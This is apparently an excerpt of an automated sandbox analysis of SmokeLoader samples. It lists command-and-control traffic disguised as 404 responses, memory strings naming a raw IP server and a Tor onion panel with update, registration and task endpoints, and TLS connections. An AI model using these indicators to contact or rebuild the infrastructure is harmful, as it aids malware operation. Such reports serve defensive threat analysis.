Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:44:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 34 35 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 48 db 45 83 1a 84 a3 4e f2 7b a4 65 17 01 6f f3 32 53 66 8e 5b 78 53 2e 80 af d0 ee 87 77 9d 62 2c 09 69 e1 b4 ed a7 58 3e 9a 75 2d b9 d4 cd 6c f0 55 0d 0a 30 0d 0a 0d 0a Data Ascii: 45Uys/~(`:HEN{eo2Sf[xS.wb,iX>u-lU0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:44:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:44:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 65 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1b 81 01 c7 5b cb f7 07 a6 3b bf 29 46 16 31 e4 76 4b 6d 82 5c 2c 13 37 c1 a5 94 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eUys/~(`:[;)F1vKm\,70
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:44:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:44:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 33 35 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1e 87 14 d0 59 9c fe 09 b7 3a e5 3f 57 5b 38 be 65 0b 69 c3 57 3b 0f 7c c3 e2 90 a9 d6 71 8a 63 32 5d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35Uys/~(`:Y:?W[8eiW;\|qc2]0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:44:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:44:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:46:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:46:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:46:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:46:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:46:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:46:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:46:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:47:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:47:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:47:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:47:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sun, 24 Dec 2023 09:47:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Source: 16E6.exe, 16E6.exe, 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, 16E6.exe, 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://46.246.96.149/
Source: 16E6.exe, 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, 16E6.exe, 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://46.246.96.149/e_userGoogle
Source: 16E6.exe, 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, 16E6.exe, 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://HTTP://HTTPS://https://httpclientcpp-agent/1.0
Source: explorer.exe, 00000002.00000000.2031996552.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2031996552.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000002.00000000.2029099333.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 00000002.00000000.2031996552.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2031996552.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000000.2031996552.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2031996552.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000002.00000000.2031996552.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2031996552.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.2031996552.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000000.2031575529.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2031598650.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2031157062.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: 820.exe, 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: 820.exe, 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.htmlTYPE=2OpenSSL
Source: 820.exe, 00000006.00000002.4437239960.0000000003697000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onion/upd.php?n=64F78ABE71A43EFA66FB
Source: 820.exe, 00000006.00000002.4431451107.0000000000824000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://x5outc76j5k4qrzaqdj2m6eq4amkkpndbqyvmvaz6yl4mmfco6oqxsqd.onionT/reg.php?upd.php?/task.php?/re
Source: 820.exe, 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https:///phpMyAdmin//PhpMyAdmin//pma/rootmysqlimapssmtpspop3sscp://your_IP_is_greylisted_README.txt2
Source: 16E6.exe, 00000007.00000003.2651389277.0000000000724000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000002.00000000.2034581816.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000000.2030558145.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.2031996552.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.2030558145.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.2029828719.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: 16E6.exe, 00000007.00000003.2651389277.0000000000724000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 16E6.exe, 00000007.00000003.2651389277.0000000000724000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 16E6.exe, 00000007.00000003.2651389277.0000000000724000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 820.exe, 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 16E6.exe, 16E6.exe, 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, 16E6.exe, 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 16E6.exe	String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: 820.exe, 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 16E6.exe, 16E6.exe, 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, 16E6.exe, 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: 16E6.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: 820.exe, 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 16E6.exe, 16E6.exe, 00000007.00000003.2348941737.0000000002540000.00000004.00001000.00020000.00000000.sdmp, 16E6.exe, 00000007.00000002.2704448307.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 16E6.exe	String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: 16E6.exe, 00000007.00000003.2651389277.0000000000724000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 16E6.exe, 00000007.00000003.2651389277.0000000000724000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 16E6.exe, 00000007.00000003.2651389277.0000000000724000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000002.00000000.2031996552.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: svchost.exe, 00000024.00000003.4371163299.000002AC1FF09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.co
Source: svchost.exe, 00000024.00000003.4371163299.000002AC1FF09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppse
Source: svchost.exe, 00000024.00000003.4371163299.000002AC1FF09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
Source: svchost.exe, 00000024.00000003.4371163299.000002AC1FF09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
Source: svchost.exe, 00000024.00000003.4371163299.000002AC1FF09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?i
Source: svchost.exe, 00000024.00000003.4371163299.000002AC1FF09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
Source: svchost.exe, 00000024.00000003.4371163299.000002AC1FF09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 00000024.00000003.4371163299.000002AC1FF09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
Source: svchost.exe, 00000024.00000003.4371163299.000002AC1FF09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 00000024.00000003.4371163299.000002AC1FF09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 00000024.00000003.4371163299.000002AC1FF09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/Inlinnect.sr
Source: explorer.exe, 00000002.00000000.2031996552.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000002.00000000.2034581816.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: 820.exe, 00000006.00000003.2414883730.000000000338E000.00000004.00000001.00020000.00000000.sdmp, 820.exe, 00000006.00000003.2418648664.00000000037B5000.00000004.00000020.00020000.00000000.sdmp, 820.exe, 00000006.00000003.2437088799.00000000029D6000.00000004.00000020.00020000.00000000.sdmp, 820.exe, 00000006.00000003.2415192472.00000000034F2000.00000004.00000020.00020000.00000000.sdmp, 820.exe, 00000006.00000002.4435371639.00000000029D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sabotage.net
Source: 820.exe, 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://trac.torproject.org/projects/tor/ticket/14917.
Source: explorer.exe, 00000002.00000000.2031996552.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000002.00000000.2031996552.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon
Source: 16E6.exe, 00000007.00000003.2651389277.0000000000724000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 16E6.exe, 00000007.00000003.2651389277.0000000000724000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 820.exe, 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.torproject.org/
Source: 820.exe, 00000006.00000002.4431451107.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.torproject.org/documentation.html

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767

Source: unknown	HTTPS traffic detected: 192.36.38.33:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.135.177.217:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.138.16.94:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.188.178:443 -> 192.168.2.5:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.87.209.205:443 -> 192.168.2.5:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.85.15.47:443 -> 192.168.2.5:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.85.15.46:443 -> 192.168.2.5:49768 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 33.3.5AAB.exe.2080000.0.raw.unpack, type: UNPACKEDPE
